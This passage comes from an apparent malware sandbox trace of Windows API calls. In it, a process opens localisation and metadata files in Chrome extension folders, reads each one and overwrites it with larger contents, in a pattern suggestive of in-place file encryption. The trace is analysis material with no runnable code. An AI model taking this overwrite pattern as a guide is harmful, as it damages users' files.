lpOverlapped=0x0) returned 1 [0139.889] CloseHandle (hObject=0x1d8) returned 1 [0139.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x160 [0139.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.890] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.890] ReleaseMutex (hMutex=0x168) returned 1 [0139.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0139.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computed_hashes.json", lpUsedDefaultChar=0x0) returned 20 [0139.891] ReadFile (in: hFile=0x1d8, lpBuffer=0x26a7768, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a7768*, lpNumberOfBytesRead=0x2b1f2bc*=0x160, lpOverlapped=0x0) returned 1 [0139.892] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.892] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa3d8*, nNumberOfBytesToWrite=0x6e8, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25aa3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6e8, lpOverlapped=0x0) returned 1 [0139.892] CloseHandle (hObject=0x1d8) returned 1 [0139.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.893] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.893] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x108 [0139.893] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.894] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.894] ReleaseMutex (hMutex=0x168) returned 1 [0139.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.894] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2a38, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x108, lpOverlapped=0x0) returned 1 [0139.895] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.895] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa3d8*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25aa3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x690, lpOverlapped=0x0) returned 1 [0139.895] CloseHandle (hObject=0x1d8) returned 1 [0139.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.896] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.896] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xce [0139.897] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.897] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.897] ReleaseMutex (hMutex=0x168) returned 1 [0139.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.897] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xce, lpOverlapped=0x0) returned 1 [0139.898] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.898] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x656, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x656, lpOverlapped=0x0) returned 1 [0139.898] CloseHandle (hObject=0x1d8) returned 1 [0140.625] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.626] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.626] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xeb [0140.626] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.626] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.627] ReleaseMutex (hMutex=0x168) returned 1 [0140.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.627] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697508, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697508*, lpNumberOfBytesRead=0x2b1f2bc*=0xeb, lpOverlapped=0x0) returned 1 [0140.628] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.628] WriteFile (in: hFile=0x1d8, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x673, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x673, lpOverlapped=0x0) returned 1 [0140.628] CloseHandle (hObject=0x1d8) returned 1 [0140.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.629] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.629] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xd9 [0140.629] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.629] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.630] ReleaseMutex (hMutex=0x168) returned 1 [0140.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.630] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c55e8, nNumberOfBytesToRead=0xd9, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c55e8*, lpNumberOfBytesRead=0x2b1f2bc*=0xd9, lpOverlapped=0x0) returned 1 [0140.631] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.631] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x661, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x661, lpOverlapped=0x0) returned 1 [0140.631] CloseHandle (hObject=0x1d8) returned 1 [0140.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.636] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.637] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xda [0140.637] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.637] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.637] ReleaseMutex (hMutex=0x168) returned 1 [0140.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.637] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c55e8, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c55e8*, lpNumberOfBytesRead=0x2b1f2bc*=0xda, lpOverlapped=0x0) returned 1 [0140.638] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.638] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x662, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x662, lpOverlapped=0x0) returned 1 [0140.639] CloseHandle (hObject=0x1d8) returned 1 [0140.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.640] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.640] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xce [0140.640] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.640] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.640] ReleaseMutex (hMutex=0x168) returned 1 [0140.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.640] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xce, lpOverlapped=0x0) returned 1 [0140.641] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.641] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x656, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x656, lpOverlapped=0x0) returned 1 [0140.642] CloseHandle (hObject=0x1d8) returned 1 [0140.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.643] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.643] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x103 [0140.643] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.643] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.643] ReleaseMutex (hMutex=0x168) returned 1 [0140.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.643] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0x103, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x103, lpOverlapped=0x0) returned 1 [0140.644] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.644] WriteFile (in: hFile=0x1d8, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x68b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x68b, lpOverlapped=0x0) returned 1 [0140.645] CloseHandle (hObject=0x1d8) returned 1 [0140.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.646] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.646] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xfb [0140.646] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.646] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.646] ReleaseMutex (hMutex=0x168) returned 1 [0140.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.646] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0xfb, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xfb, lpOverlapped=0x0) returned 1 [0140.647] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.647] WriteFile (in: hFile=0x1d8, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x683, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x683, lpOverlapped=0x0) returned 1 [0140.648] CloseHandle (hObject=0x1d8) returned 1 [0140.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.648] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.649] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x108 [0140.650] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.650] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.650] ReleaseMutex (hMutex=0x168) returned 1 [0140.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.650] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2a38, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x108, lpOverlapped=0x0) returned 1 [0140.651] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.651] WriteFile (in: hFile=0x1d8, lpBuffer=0x28790d8*, 